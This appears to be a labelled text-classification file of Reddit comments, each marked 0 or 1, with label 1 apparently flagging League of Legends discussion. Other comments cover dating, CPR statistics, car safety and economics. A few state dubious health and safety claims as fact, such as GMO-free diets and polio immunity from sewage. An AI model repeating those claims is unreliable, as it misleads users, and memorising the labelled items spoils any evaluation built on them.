0	That's just it though. Its not something I feel a need or want to do. My GF doesn't just want it during sex, she wants it during foreplay to. I understand the attraction and everyone has their kinks, but I've never wanted to be an asshole to anyone, let alone the person I love. I mean we're talking grade A douchebag stuff turns her on. From literally forcibly undressing her and pinning her down to touching her in her sleep, it all turns her on. It took me weeks before I didn't feel bad about saying and treating her that way and for at least a couple months after that I still felt the need to make sure we had a post coital talk to make sure she was okay with stuff. To be honest I pretty much had to reference what I've seen on TV, read in books, and saw in porn for what to say Because I don't inherently want to say them. Not all guys want to treat girls like shit, some on us like candle lit dinners, a bath for two, and a night of passion as opposed to the rough stuff. On the upside though we communicate our needs and wants really well so both of us are very happy with each other.
1	Ok while this is a valid strategy depending on your allies/enemies, this 'tip' is more of an alternative playstyle (more risk, more reward) than the usual w-with-doranshield.   Taking W first is vital if you are defending off invades or participating in level 1 action. The higher up you go, the more you will encounter teams trying a 5 man invade to take advantage of unaware or lazy players. When 5 players meet 5 players, your q does 100% nothing for your team. Not having W stun up can be MASSIVE in these situations and you will regret it if a big clash happens.   A lot of supports are IMPOSSIBLE to trade with without your stun up. Tresh, leona are extremely popular and will crush you if you try this q harass stuff. In the vid hes doing it against fiddle, which is the kindof champ you can do this against. A lane with high kill potential (blitz, leona, thresh, ali) will poop on you a lot.   Another problem is the level 2 all in. By taking Q, if you do NOT win the lvl 1 trades hard and they manage to outshove you, a lot of bot lanes will all in and remove you.   By taking shield, you are again a lot more vulnerable to people going aggressive on you. Ring provides more damage and mana, but less defensive stats. The obvious result is that jungler ganks, powerful skillshots (hooks/leona/zyra/jinx) and targeted cc (ali/annie) will kill you MUCH easier. Its risky to try this against skilled and smart opponents.   The reward can be good, because obviously you are a big bully. If you want to try this sortof thing i can also advise a 26 ap, magic pen + armor runepage. If your opponent gets surprised by this at level one, its one of the easiest and quickest ways to win botlane all by yourself.
0	I think if we had any sort of food culture in this country, it wouldnt even be an issue. Very few people abroad are vegans, because they learn how to ear properly (lots of fruits and veggies, little meat), and their food is healthy (not processed, not as many sweets, no GMO foods, properly raised meat).
0	Cars are specifically designed to protect you from death, if you feel like you don't have much control, get a car with rack&pinion steering and a tight suspension. Don't get an SUV or truck, they have poor safety, a five star crash safety rated truck is only worth a three star crash safety rated car and SUVs are graded as trucks. Get a heavier car though, sedans are good. If you find it scary then that is good, you should be. It will make you a better driver than most of the asshats on the road. However, if you are not inconvenienced by only using a bike, good on you keep on keeping on.
0	I apologize for the long comment in advance but this is relevant   "It's sad how wimpy Americans have become, especially when it comes to any risk whatsoever -- take germs, for example...   Where did this sudden fear of germs come from in this country? Have you noticed this? The media constantly running stories about all the latest infections? Salmonella, E-coli, hanta virus, bird flu, and Americans will panic easily so everybody's running around scrubbing this and spraying that and overcooking their food and repeatedly washing their hands, trying to avoid all contact with germs. It's ridiculous and it goes to ridiculous lengths.   In prisons, before they give you lethal injection, they swab your arm with ALCOHOL. Wouldn't want some guy to go to hell AND be sick.Fear of germs, why these fuckin' pussies. You can't even get a decent hamburger anymore because they cook the shit out of everything now 'cause everyone's afraid of FOOD POISONING! Hey, where's you sense of adventure? Take a fuckin' chance will you? Hey you know how many people die of food poisoning in this country? Nine thousand, that's all, its a minor risk.   Take a fuckin' chance bunch of goddamn pussies.Besides, what d'ya think you have an immune system for? It's for killing germs! But it needs practice, it needs germs to practice on. So if you kill all the germs around you, and live a completely sterile life, then when germs do come along, you're not gonna be prepared. And never mind ordinary germs, what are you gonna do when some super virus comes along that turns your vital organs into liquid shit?! I'll tell you what your gonna do ... you're gonna get sick. You're gonna die and your gonna deserve it because you're fucking weak and you got a fuckin' weak immune system!   Let me tell you a true story about immunization ok. When I was a little boy in New York city in the nineteen-forties, we swam in the Hudson river. And it was filled with raw sewage! OK? We swam in raw sewage, you know, to cool off. And at that time the big fear was polio. Thousands of kids died from polio every year. But you know something? In my neighborhood no one ever got polio. No one! EVER! You know why? Cause WE SWAM IN RAW SEWAGE! It strengthened our immune system, the polio never had a prayer. We were tempered in raw shit!   So personally I never take any precautions against germs. I don't shy away from people who sneeze and cough. I don't wipe off the telephone, I don't cover the toilet seat, and if I drop food on the floor I pick it up and eat it!Even if I'm at side walk cafe! IN CALCUTTA! THE POOR SECTION! ON NEW YEARS MORNING DURING A SOCCER RIOT! And you know something? In spite of all the so called "risky behavior ".... I never get infections.I don't get em. I don't get colds, I don't get flu, I don't get headaches, I don't get upset stomach, And you know why? Cause I got a good strong immune system! And it gets a lot of practice!   My immune system is equipped with the biological equivalent of fully automatic military assault rifles, with night vision and laser scopes. And we have recently acquired phosphorous grenades, cluster bombs and anti personnel fragmentation mines.   So, when my white blood cells are on patrol reconnoitering my blood stream seeking out strangers and other undesirables, and if they see any, ANY, suspicious looking germs of any kind, THEY DON'T. FUCK. AROUND. They whip out the weapons, they wax the motherfucker and deposit the unlucky fellow directly into my colon! Into my colon. There's no nonsense! There's no miranda warning, there's none of that three strikes and your out bullshit. First defense, BAM! Into the colon you go!"   -- George Carlin
0	HAHA you douche the kids are just gonna think its tits because the world looks like boobs haha lol jk
0	Couple of things.   First, arrest in adults often has an underlying cardiac cause.  Children's hearts are generally healthy and as such performing CPR on a child in cardiac arrest is more likely to lead to a favourable outcome such as  ROSC . A frequent cause of cardiac arrest in children is stuff like chocking: respiratory arrest with no underlying cardiac pathology. If the airway can be cleared there is a  fair  chance that CPR alone, or more likely CPR and defibrillation can restart it because the heart itself is healthy.   Second, and more important point:   >CPR only works 8% of the time and that's probably high   Actually the range is quite a bit [bigger than that](   Any single number on "CPR effectiveness" is bound to be a pretty gross simplification. Are we talking in-hospital? Out-of-hospital? Witnessed or unwitnessed? Bystander CPR or healthcare provider CPR? What age? It is important to realize that this abysmal "8% success rate" is for  all etiologies . This rate isn't "CPR should have helped and it didn't", it's " any  time anyone attempts performs CPR on a dead person for  any reason "   Imagine that a patient was stabbed in the heart and loses 90% of their blood. Bystander performs CPR. The patient dies. Does this prove that CPR is not effective? Of course not. Similar with cases where CPR is performed on someone who is in anaphylactic shock/without an airway, has lost large amounts of blood, etc.   The real test of CPR effectiveness is to compare patient outcomes in patients with cardiac etiologies:   >An arrest is presumed to be of cardiac etiology unless it is known or likely to have been caused by trauma, submersion, drug overdose, asphyxia, exsanguination, or any other noncardiac cause as best determined by rescuers   This King County  study . 57% of these patients survived to be admitted to hospital and 34% of those CPR'ed were discharged alive.   So, 12% of the patients on whom CPR was attempted survived to the hospital, but 57% of patients for whom CPR  should  have helped made it to the hospital.   I apologize for the long-ass comment and all the italics, but I hear this statistic all the time and (IMO) it's a little bit misleading.
1	I remember one of my promotion series (For Silver 3) was pretty intense. I had been an a winning streak going from 0 LP to promotion over the course of a couple days. I split the first two games but they were both extremely close. Ultimately, it all came down to the third and final game.   Everyone ended up getting the role they wanted and I go top with Irelia. The game started off as a disaster. People were dying even when the enemy jungle was nowhere to be seen. Every lane was losing and our jungler was scrambling to put out the fires and got caught/killed a couple times himself.   Eventually, we lose two towers and lose a team fight for dragon. The game goes on and we start to come back in a big way because we start catching them in their own jungle. After a tense war of lane pressure and counter warding, we force a team fight near baron and manage to break even. Up until then we were getting steam rolled so the momentum begins to shift.   After that baron fight we win the next two exchanges. We don't ace them but we do enough to take out 3 or 4 of them and push a tower. Soon (after some more skirmishes) we are ahead of them on towers and kills. It went from being around 15-23 to about 26-23. We see the enemy team running toward baron so our pings go off and we start racing there to respond to the threat. We wait in the bush and wait as long as we can before we're forced to engage them. We got aced.   Our Thresh, who had missed every hook I saw him attempt, was sitting at our fountain the whole time. We ask him if he had dc'd and he responds that he's not going to play anymore. We were confused. Nobody had raged at him, demanded him to do something, or even asked him to do anything. He explains that he's going to throw because we wouldn't listen to him during team fights.   My teammates start begging him to move, saying sorry even though none of us at any time (Yes, I went through the chat log to see if someone had said something to him. Couldn't find anything.) did anything worth apologizing for. I explain that I'm in series and he responds with "lol, that sucks". Needless to say we lost the game and I failed my promotion series.   I had similar luck on my last series but with a much better result. The first game of my most recent series our Lux inexplicably went AFK (not dc) 3 minutes into the game. He came back at 13 minutes into the game (Pretty much lost at that point) and said "Lol, it doesn't matter. This is my first offense. Go ahead and report me."   Then the Lux, with no fear of punishment, went on and started intentionally feeding the enemy team, all the while telling the other team in all chat to report him. Needless to say we lost the game about 17 minutes in. The worst part about it was that this was the final game of our Blitzcrank's promotional series.   I think something needs to be done about this. People work hard during their series and it's very discouraging when they lose because of this type of stuff.   EDIT:
1	I believe streams should become a part of the subreddit again, for it allowed people to visit streams they otherwise would not have thought about visiting, especially for those who don't use the chrome extension to view all of the live streams.   I think that if streams were allowed to be posted again, not only would the upvote/downvote function allow for the community to decide what it wanted on the frontpage, but it would allow for lesser known people to gain a following as well, provided they were putting out good content that the community appreciated.   The only thing that the community needs to be wary of, is while allowing streams to be posted, there needs to be some form of quality control over what streams get upvoted. If we have the same problem that occurs in /r/music, where the same 15 songs get put into the front page consistently, more rules would have to be put into place.   Edit: A system like /r/videos has would be nice, where it notifies the poster that their link has been posted previously. Perhaps this notification can be made to vanish on its own after a week, or two weeks.
1	I get that telling someone to die or to kill themselves is fucked.  How is this different from any other game.  Take call of duty. I remember hearing grown men tell little kids they were gonna come to their house and murder their entire families.  Has it ever happened? Nope. Could it? slim chance. This is the internet. Here, you can say whatever you want. Morales do not apply. I could be a highly respected city official. But, these people still get on chatroulette and slow jack it for hours to anyone unlucky enough to cross over it.
0	Well, a lot of our history is taught from a White European/Westernized point of view. Especially at the university level, this becomes really obvious, because you have General Education courses such as "Humanities" which tend to focus on Western European history.   High Schools, especially in American History, do a decent job of focusing on Black History within the courses, but leading up to that, you learn about European History above all else, and when Black History comes into play (i.e. Civil War), public education tends to place the focus on how the Black Experience was a part of the White-Dominated culture. Although Blacks are involved in history teachings at some level, it is very often in a way that is dominated by Western, White cultural assumptions and generalizations, which  sort of ruins the point.
0	France used to have 110V. even if there is no longer discrepancies between the voltage used now, it was a time where this wasn't true. As you can't simply decide to change all the outlet of a country at once, making difficulties with difference between houses all all others shitty situations, you keep your outlets design, even if they were used as safty measure that are no longer required. quoting your wiki article : " Plugs and sockets are designed as a system to meet standards for safety and reliability."
1	This video is spot on. People who are flaming Dyrus aren't looking into the fact that Dyrus is in this position to be ganked over and over again because HIS TEAM puts him in that position. Personally I think that TSM can win with this style of play, ie putting Dyrus alone on an island to be ganked, in NA because the NA teams can't take the game with that 1-2k gold lead that is a result of the camping. Then look at SKT, EDG, AHQ, Fnatic. These are some of the best teams in the world and if you give them a gold lead, they WILL punish you for it.
0	In which case, after the fact, you would be the person asking her out right? Even in the case with grown ups you initiate the "do you want to go out for drinks sometime" plan.   Nope. Nobody asks like that , it would be weird and awkward. Normally it goes like this: two people notice each other, one initiates flirting, the other responds. They flirt, laugh, touch a bit, drink some, talk, flirt more etc, rinse-repeat until they end up banging. Afterwards, if they want, they make plans together to go somewhere and do something (in vast majority of cases, it is something they both enjoy, and it turned out naturally mid-conversation).
0	Totally agree.  Its a bout being a bro when they are NOT being bro-worthy that counts.  The best thing would be to convince your friend or even beat his ass for being a douche and cheating.  Telling the wife was a weak bitch move imo.   And all the boys using chivalry to justify OPs move doesnt know what real friendship should be about.  You protect them from the outside and do what you can to let them make the best decision between you two.  At least give him an ultimatum of him coming clean, breaking it off, or you will tell the truth.
0	This actually occurred to me once at the age of 16.   To defend myself I was in Germany and was heavily intoxicated after having drank quite a few beers at multiple places.  Being 16 and a little over 120 lbs I was handed a literal glass of what I assumed to be water since it was blatantly obvious how drunk I was. Also, who hands someone a GLASS of vodka. That's just preposterous right? Wrong. Apparently at this bar in the lovely town of Muenchen (aka Munich - don't have umlauts so used ue) this was typical. So being thirsty I quickly drank what was in front of me.   Immediate reaction? Puked everything I had drank over the past hour on the bar.
0	So here's the deal. I'm gonna need you to go ahead and come in on Monday. I know you want to go on 4cat and post your human pictures for Monday Manday, but we got some serious work to do. Apparently, some one thought it would be funny to put a laser light show in the break room so now we need to capture, BY  HAND  PAW, every single speck of laser.
1	OK, some feedback from an actual journalist and news editor. Apologies if this is harsh, but since you asked...   I'm only going to be looking at the most recent link you posted, the Doublelift article.     >CLG's Peter "Doublelift" Peng has been known as an avid trash talker.   Is there any evidence you can link to to support this? I'm not disputing it, but if you're trying to be taken seriously, it's better to work with facts, rather than vague and debatable statements like this about the opinion of "the community". Instead, you could cite some specific instances of his trash-talking, ideally with links.   > Still hated by many, Peng is a complete genius when it comes to hyping up crucial matches   He's a  complete genius ? That's a pretty debatable statement, and one that you offer zero evidence for. Already, I'm a bit confused as to whether this is meant to be a piece of journalism or an opinion piece, but either way an extreme statement like this needs some support.   >Doublelift is frequently   Why are you alternating between calling him "Doublelift" and "Peng"? Pick one, this is unnecessarily confusing. You were right to use  Peter "Doublelift" Peng  the first time you mention his name, but after that stick with only Doublelift or only Peng. Not both interchanged like this.   >funnel gold and kills into him   into  him? This sounds weird.  To  him.   >an all time legend   all-time   >half decade   half-decade (you could argue this, but usually hyphenated)   >a dwindling superstar.   Is  dwindling  really the best word to use here? I know what you mean, obviously, but it seems like a strange choice. "Falling" may be a bit more cliche, but it reads cleaner and it paints a clearer visual picture.   > was literally on top of the world.   No, he was  figuratively  on top of the world.   >solidifying a future of long-time Korean dominance   One year is long-time dominance?   >citing that he didn't believe   Again, just seems like an odd word choice here with  citing . It seems like you're just trying to avoid using a "boring" word like "saying" or "explaining," but don't. This is journalism, not literature. Not all of your readers are educated. Not all of them are native English speakers. The goal is to communicate your information as  simply and clearly  as possible. Throw away the thesaurus.   >he knew deep down that he would soon rule the competitive world of League of Legends   What? You're inside his mind now? This seems like complete speculation presented as fact for the sake of making the moment more dramatic. Don't do that.   But if you're not just making that up, you definitely need some kind of support for it: a link to the interview where he said he was thinking that, probably. Otherwise people will have the same reaction I had.   >Even though he had stated that he believed Piglet to be the best AD Carry of all time during the Season 3 World Championships   Unclear phrasing. Was the  statement  made during the world championships, or did he mean Piglet  performed  better than any ADC ever had before during the S3 world championships?   >Responding to the controversy the above claim prompted   "the above claim prompted" is unnecessary and can be deleted; it's clear from context what controversy you're referring to.   >Piglet joked in an interview with Travis Gafford that he could defeat the American ADC with a hand tied behind his back. Though he was clearly having fun, Doublelift's arrogance strangely   Confusing subjects here. The subject of the first sentence is Piglet, and the next sentence begins with "he", so readers will naturally assume you're talking about Piglet, only to later discover you've actually switched back to talking about Doublelift. It's awkward.   >who don't have enough context to know that he's just trying to gather hype for matches.   And how do  you  know his intentions? Not saying you're wrong, but you're repeatedly talking about what is inside players' heads with  zero  supporting evidence offered. It reads like you're just making it up.   >Deciding that their team's play was no longer acceptable, SKT made the decision to cut their own Bot Lane.   This may vary depending on gp10's style guide, but generally organizations (teams, companies, etc.) should be referred to as singular rather than plural. So "its team", "its own bot lane", etc.   >Battered   I suppose you mean this figuratively - battered in the game? But this is a bit weird because you're talking about his response to being cut. Him being devastated makes total sense, but calling him "battered" is weird because it's not like they beat him up when they cut him. I guess it can still work if you call it a metaphor for his emotional state, but it still reads weird and you'd probably be better off just saying "devastated" and dropping the battered bit entirely.   > citing that he didn't regret what he had said about CLG's Captain   In the other case I mentioned it's arguable, but citing is definitely not the right word here. Also, captain isn't a proper noun and doesn't need to be capitalized.   >While he may be approaching the end of his career, I believe that we can all look forward to Doublelift   Once again, you've done the bait-and-switch: one sentence is about Piglet, and the next sentence begins with "he" but  isn't  about Piglet. This is the kind of stuff that gives non-native readers nightmares.     So, that's most of the nitpicky writing stuff. More broadly, though, I'm not really sure what this article is meant to be. If you were going to pitch this idea to an editor in a couple of sentences, what would it be? I guess it's a summary of some recent drama and a little bit of Piglet's history, but I'll be honest: I'm not really sure what you're thinking readers are going to take away from this piece that they didn't already know.   Everyone has already heard about what Doublelift and Piglet said, and everyone already knows what happened to SKT. But this article doesn't really offer anything else. There's not a strong opinion being argued, there's no analysis of which of the two of them is actually better, there's no speculation about how the two might compare and contrast over the upcoming LCS split, and there's no real conclusion readers can draw from what you've got here.     And since I'm already being a critical asshole, I'll just say: I think these issues affect a lot of GP10 articles. If you guys want to be taken seriously, I think you need to do a few things:     Fix the design. It looks extremely cheap and unprofessional. There are plenty of FREE wordpress themes that look 1000x better than GP10's site right now. (edit: yes, I know you updated recently, but I still think it looks bad. Better than before, yeah, but bad.)   Hire an editor. My  god , hire an editor. OP, I obviously had a lot of issues with your article but from what little else I've read on GP10 I'd say you're one of the better writers. And the errors aren't even limited to what's (poorly) written in the articles themselves! There are mistakes just in the site's basic messages, like "Support our writer by  share  this article" (should be  sharing ) and "This Post Has Multiple  Page " (should be  pages ). But a good editor will also help you focus your pieces and will make them much better, not just fix all the errors in the copy.
1	When you have a team of 5 you can't just throw the 5 best players together and call it the best team. It's much like basketball, the teams play-style revolves around a star player and they play to that players strengths. Typically, the European scene revolves around the mid player and their synergy with the jungler, see Alex Ich, Ocelote, Xpeke, there's a reason they are the front men of the teams. It's also why people say EU botlanes are bad, but obviously they aren't bad, they just aren't the foundations of the teams.   Imagine a team fight, Alex Ich is diving in, Diamond is diving in, Darien is diving in, which leaves genja to do the most damage he possibly can given the situation. They are playing to Alex's strengths, he is the star player and thus the team play-style is dictated by it.   Now imagine CLG in a team fight. Doublelift obviously being the star player, his team is doing everything they can to let him carry. They peel as much as possible. It's just differences in team play-styles, that's all.
0	That's so damn unfair. I'm sorry but it is. I'm literally just out of journalism school so I'm pretty idealistic, but come on. So any other industry is allowed to make money but god forbid news networks do? It's 2014 and CNN, Fox News and everyone else knows it. You can get your news and billion different ways. They have to compete with all these websites that can tailor make coverage to users. This story has a very mysterious appeal to it, which is not something that comes around that often. Ratings pretty directly reflect what people like/are drawn to. So god forbid they cover the stories that are gonna draw in viewers. Cause if they did that they'd be as bad as murderers, thieves, and rapists... I'm a sports reporter so I mostly watch ESPN, but it's hilarious because people complain about the exact same thing about that network on some of the sports subreddits. I swear almost every other "circlejerk" gets called out around here, but every time an anti-media circle jerk comes around, every single person is on board because everyone wants to sound "too smart to follow mainstream media." Sorry about the rant.
1	This is a great way to think about it.   LoL offers so many hours of enjoyment for free.  There are not many free games as good as it.  If I'm playing LoL instead of going out and spending money on entertainment(as I might normally) then I'm effectively saving money.   I'm getting great entertainment and saving money.  I think I can spare a fraction of that to tip Riot for a job well done and get some new champs while I'm at it (I probably won't buy skins until I've got all the champs I like).
0	I once spent two weeks, 3 hours a night, writing an essay for history class. I even had my mom help me, since she had majored in History and English. Anyway, cut to a week after it's handed in and I get my essay back. It's got a B+.   A. B. Fucking. +.   I looked at him with complete disbelief. I had sacrificed  hours  of each night, for two weeks, had my mother nitpick each revision, and even skipped a friend's birthday party for a  B+!?   That was unacceptable. I had been getting shut marks from this guy this whole semester, and I was planning on this being my first A+ in a long time . I go up to him, and ask him, and I quote, "Why the fuck did you give me a fucking B+ on this fucking essay?" I was normally a pretty quiet, if not awkward, kid but I was so angry that I wanted to punch him in his well shaven face.   So he looks at me and says, no change in his previously neutral expression, "You obviously didn't try hard enough". I can't honestly say that I didn't want to take his pencil and jam it in his ear, because I really, really wanted to. But I decided to, instead, learn how to write the best fucking essay in the whole world. After that day, I never got less than an A on an essay, ever again.
1	I disagree, a good jungler will make the right decision, and know who will make more use of the buff. I am a platinum and relaying on your mid to kill or start to snowball his lane isn't a proper way to approach things. As a plat player,  i often meet people that are equally matched as me, and it's REALLY hard to kill them without trying to pull some risky faker play, which in ranked is something, you want to avoid. For example, a good Lee jungler, would be able to realize that his mid Orianna would make more use of the blue buff against the enemy Syndra, despite nobody dying yet. It would instantly give your ally the ability to pressure,harass,and roam, and just a full control over the lane, which is crucial for a mid laner to carry. But if you're an Elise, and both enemy top and bot are aggressive, and you need the extra cdr and mana to gank, while your mids are passive, than sure as hell take it, because you will make more use of it. But most of the time when you're a lee, it's good to give it to your ally, unless they are losing their lane hard, and have died few times already.
1	The first point I FULLY disagree with, of course there is carrying in team games. Just think about something like football (soccer) yes there are 11 players but if one just manages to make the game winning plays all the time then he is carrying his team. Same with League, if one person is doing  all the damage and winning the skirmishes/teamfights/getting the objectives for the team then he is carrying.   The second point is somewhat arguable, League is a snowball game. If someone gets first blood, chances are that the person who got it will win the lane because he will get items faster, he will get levels faster, and if played correctly he will deny the other person these things as wel. He will have a HUGE impact in terms of damage/utility to his team than the person he beat and that will transition into his team doing better because while they have this person with all these completed items, the other team has a guy with maybe 1 completed item, levels behind, and not generating much gold for the team.   Matchmaking is pretty bad I must admit. You don't need to play over 200 games to get to the ELO you "belong" in, people do it sometimes in under 100 games. If you're taking that much time to go up in ELO then you probably (not always) are just progressively improving and are probably at the ELO that you should be (although a ton of people don't like to admit it).
1	Honestly I thought saint was one of the best junglers out there until the CDE vs Dig rematch. IMO, he got badly outcalled by jatt (look at how on the ball dig was with their timers for objectives. You can bet your ass Jatt had all of that planned minutes in advance) and he used the same jungler with the same build even when it seemed to be fairly suboptimal in some cases. (why rush a mogs in game three. Why why why. Conversely, why pick noct over trundle/amu/rammus/skarner in game one. His team needed a durable initiator, and while noct CAN do that, there are many others much better suited to it.)   Last but not least, his obsession with ganking rumble top on multiple occasions seemed extremely derpy to me. He could have put pressure on bot and mid much easier and maybe secured an early dragon for once. From what I've read, and from my own experience, top is the worst lane to gank, it has the least payoffs, highest chance of failure, and puts you miles away from dragon. Yet IIRC, saint put the most pressure on top lane in all three games.
1	So the only thing missing was which theaters and where.  We have a very nice Carmike Theater here in Indianapolis for instance but I don't know if they'll get it or not.  Please full geographical list soon!
1	I'm not stating based on caster opinions, I'm stating based on personal experience and pro player opinions.   Ofc BF first buy is ideal, but you don't always back with 1550 gold. The second best aggro build early on is 2x Dblade and greaves, as vamp is sustain, not aggro.   Korean pros were the ones who pioneered 2x Dblade and greaves rush... I'd assume you'd know but I guess you're just a bandwagon fanboy. Locodoco talked about this build when he was subbing for DoA in OGN Winter about how many pros rush that build on Caitlyn as it's the fastest way to be dominant in lane.
0	When I was 21 two of my coworkers told me to get on a bike and ride. They knew i had never learned as a kid and as an adult, was in no hurry. i got on the seat and gripped the handlebars. they each held the back of the bike seat and a handlebar and started slowly walking forward. my feet were dragging so I put them on the pedals. My coworkers picked up speed until they were running and told me to start pedaling, they soon peeled off and i was doing it. I felt like a big boy, it was a very proud moment.
0	There are definitely male equivalents to the "child birth" level of pain. I had gone into the ER one night because I had completely lost the ability to urinate but my bladder was still full. The panic of having lost the ability to pee mixed with the intense pressure inside my body mixed with the unbelievable pain of the nurse who did not realize I had a stricture (scar tissue built up in the urethra) shoving a large catheter up my urethra unsuccessfully multiple times while telling me to "relax" because it was me that was stopping the catheter and not the fact that scar tissue had basically completely plugged up the hole I once had to pee through. It had a happy ending though. Because although she eventually shoved it through, most definitely causing further damage, I was able to get an actual diagnosis later and I had a surgery to remove that part of the urethra.
0	I actually think WebMD is brilliant if you aren't a hypochondriac.   My mom hates Drs and will do everything in her power to avoid seeing one. In 2009 she was experiencing some odd symptoms so she looked at WebMD, which returned cervical cancer as the most likely cause. Turns out WebMD was correct as my mother was diagnosed with cervical cancer just a week later. She was able to get a hysterectomy and has been cancer-free for 4 years.   This past year, WebMD helped me, as well. I was having sex and all of a sudden I ha an excruciating pain in my head. It was like a headache that went from not existing to vein the most pain I've ever felt in my entire life in about a span of 3 seconds and only last 10-20 seconds. According to WebMD, I experienced a "thunderclap headache". One CT scan and lumbar puncture later and I'm healthy and alive :P
1	I have this, really, really, really bad idea, that wont work.   I'd say, you have one shot to make it right, one shot to make them change their minds, if not completely, at least give you some abatement.   You are going to give a presentation to your parents. Not just any presentation, but the best presentation they have ever seen.   You need some base information about your parents, their hobbies, work, tendencies.   Approach your parents by saying, you want to make things clear for one final time and ask them if they could have in them to give you a chance to make your case.   You will need to make them promise, that they will not interrupt you at any point, that they would listen through the presentation fully, and then say their arguments ("questions"). Ofc they still will interrupt you, since they are your parents but you can then say along the lines "please sir/mam, you promised to hear me out first". Always be polite but strict.   Now, how to do the presentation and in what order to input data. It should go something like this.     You make a short but clear statement of the situation you as a family are, just flat out truth, with no statements about how you feel. Only facts.     You bring out the things you think your parents are worried, you dont state them as truths, but as "it seems to me that you want me to xx" Here you thank them for the concern, and you are happy that you have parents that care enough to set limits (true or not).     Here you try to make your hobby more understandable for them, comparing it to  their hobbies tendencies and such. There might be stuff coming out like "its not the same" here you just say, "please let me finish first."     Here you make a point about how this is how you socialize, and how you can understand of them not understanding it, but that you have real live friends through this and this is your shared hobby. Point out, that you are not the kind of guy who goes out to socialize that much.  You can also show here a straight up timetable, with exact times on how you plan on using your time between your hobby, friends and school.     This is when you show your cards. You say truthfully how their  actions make you feel (constricted, caged, not letting do own mistakes?), say that you understand they have the best of intentions.       Close with saying, that you dont expect them to just drop all restrictions, but if you could find a middleway that suits both and all that you ask is for them to at least think about it, saying you are ready to take more responsibility of your actions.   For the presentation, you need to rehearse it really really well. Memorize everything u want to say, put it on paper first.   Dont sound whiny, try to sound solid and responsible. Make bulletin points, charts and everything. Use a lot of time.   You probably need to do all this with papers and stand unless you have projector or something alike.   For the presentation Dress to your best suit, i mean it. It sounds silly and at first will be, but as you calmly address your case, it gives more serious feel. Also make the presentation in a room THEY feel comfortable to be in, preferably not your own room.   Try to keep it in 15 mins length max. If it goes a bit over, its not the end of the world, but it starts to be hard to focus on listening as it drags on.   As i said, its a really really stupid idea that wont work, doesnt mean you shouldnt try though.
0	Don't feel bad. I had an asshole driver pass me on the right side of the road once to get around me and go to the hospital. He barely squeezed past me without crashing and scared the shit out of me. The twist was that I was taking my mom to the ER as well. We both had to sit in the waiting room together and wait our respective turns--a good amount of time--except I got to the hospital without driving like a fucking animal.
1	thanks guys.  ya i dont really like ali as support either, but we needed a support and he was all i had atm.  (i immediately bought soraka and janna)  ive looked at builds, and after reading what you guys said the skill order of q over the heal makes sense.  the heal isnt all that great, but the increase of cc from lvling q is great.   the whole cait=poke makes sense too.  she doesnt have anything to burst with.
0	Did you not read the context of my post very carefully? Like I said, this guy that died was likely a lot of things to a lot of people - a co-worker, a brother, a son, yes... but also, to at least one person out there, he was the guy that was fucking his wife.   Just as his friends will mourn his loss, I think that OP should be free to celebrate it. As the saying goes, you're entitled to your own opinion - why shouldn't that extend to your opinion of someone's life? Making a rule that says "you must treat all dead people as saints" seems rather arbitrary to me. If you're truly this man's friend or family, then yes, I could see how you would want to forget the bad parts and try to only remember the good. But what if you were like OP, who only knew this guy through one terrible aspect?   Quite frankly, I'm sure that there are one or two people out there whose lives were positively affected by the Boston Bombers (Tsarnev brothers). They also had friends and family. Does that mean that the families of the Boston Bombing victims shouldn't take solace in the older Tsarnev's death? Or feel relieved when the younger one ultimately dies?
0	I manage an online store in Canada and it annoys the shit out of us when customers email us stating they have a promo code but it won't work. They check sites retailmenot, bargain hunter, redflag deals etc. Not only are all codes we find listed inactive but they are always widely misleading. Something like SAVE10 people wonder why they aren't getting 40% off their purchases.
0	Basically, the graph is supposed to show that unemployment is just the difference between how much labor is supplied (the people are willing to work) vs. how much labor is demanded (the amount of jobs that are offered by the market) all at a specific price.   For example, minimum wage in the US is around $7.75. According to theory (and I'm not saying that this is wrong or right because most of economics is theoretical) there will be people willing to work for $6.00 an hour. At this lower price, far more jobs will be offered by companies so  in theory  the amount of people unemployed will be lower.   The idea is that when a market (such as the labor market) is left to it's own devices, the price of the good (in this case labor) will naturally settle to the equilibrium price--the point when the demand curve intersects the supply curve. At this price, there is neither a surplus or a scarcity of the good which for our purposes is labor.
0	I appreciate that you're trying to help out and it's a good thing you put your disclaimer that you aren't an expert, but your information is kind of not on the line.   For a beginner, as much as with anyone else, training should consist on what the person wants to do. It's why you have people who do SS or Blaha's 5x5 deal where the point is to do low reps and such.   As for the weight, if you're starting, you can probably increase by 5 every work out or two with rest days occurring at a day in between, for a beginner.   Now this is how I started my training, but I formulated it off of YT fitness (Blaha, Isuf, Hulse, McCarthy, etc.), browsing /r/fitness, /fit/, and BB forums. As well as talking to the weight lifters at my gym
0	See, i would've understood that, but the fact that the sidewalk was in a residential area (no signs, clear sidewalk), and that there was an open bike lane is what got me upset. I mean cmon, he even stopped at a stop sign before turning onto the next street.
0	To take your point a little further, I had a friend who would blame and expect payment for any item of his that broke if you were the one who discovered if said item was malfunctioning. Example: playing x box, for no more than 10 minutes with his 4 year old controller, inform him that one of the buttons is not responding....boom "what'd you do!!!! You owe me a controller! " through no negligence or misuse of my own, I am suddenly responsible for replacing an item that was already, or destined to break the next time someone touched said item. For all we know op's mouse was fucked before the roommate had the misfortune of left clicking. Cat knocked it over, too much semen clogging up the scroll wheel, all I am saying is that there are too many suspects to call this an open and shut case of property abuse by roommate.
0	The real people to blame are the publishers who sell the books to the Bookstores.   Or maybe blame the whole "more-is-better-culture" in American  university literature?   I study physics in Sweden and I always sigh when an American book appears on the reading list. Without exception these book are much, much longer than books written by Swedish professors and seldom contain more useful info.
0	In my experience the scale slides a little differently for each sex.   As in, a hot 9/10 girl will date a guy who is a 5/10-7/10 if his personality makes up for it and he treats her well.   A guy typically will not go more than 2 points below his scale no matter how spectacular the personality. If the guy is a 9/10 he's almost certainly not dating under an 8/10-7/10.   Again, just in what I have observed around me.   But  it should be noted that there is more wiggle room when both parties are 6/10 or under.
0	I saw some versions of this in the comments, but it comes down to psychology and cost/benefit analysis.   The psychology of it, in Reddit terms, is a plea for mercy as the person posting has seen the savagery of Redditors when it comes to shitty posts; they hope theirs is not shitty and therefore ask for a modicum of forgiveness if is is kinda shitty.   If they're observant, it can be a calculated cost/benefit in that they know their post is not too shitty, understand that "first post"  will  offer them a modicum of forgiveness and some subsidiary pity upvotes, and use the phraseology purposefully despite that the very wording will earn some automatic downvotes.
